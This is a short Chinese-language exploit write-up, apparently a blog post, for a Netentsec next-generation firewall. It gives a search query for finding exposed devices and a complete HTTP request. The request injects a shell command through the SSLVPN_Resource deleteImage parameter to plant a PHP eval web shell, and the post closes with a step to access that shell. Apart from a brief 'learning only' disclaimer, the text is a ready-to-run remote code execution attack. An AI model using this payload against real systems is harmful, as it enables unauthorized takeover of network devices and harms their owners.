仅供交流与学习使用，请勿用于非法用途，否则后果自负

引用大佬文章

https://xz.aliyun.com/t/9495

寻找目标

app="网康科技-下一代防火墙"

抓包改包(Host和Referer)

POST /directdata/direct/router HTTP/1.1
Host: xx.xx.xx
Cookie: PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xx.xx.xx.xx/user/login/index/logined/fail
Dnt: 1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Connection: close
Content-Length: 221

{
    "action": "SSLVPN_Resource",
    "method": "deleteImage",
    "data":[{
      "data":["/var/www/html/b.txt;echo '<?php @eval($_POST[a]);?>'>/var/www/html/test.php"]
    }],
    "type": "rpc",
    "tid": 17
}

1.jpg

访问shell

2.jpg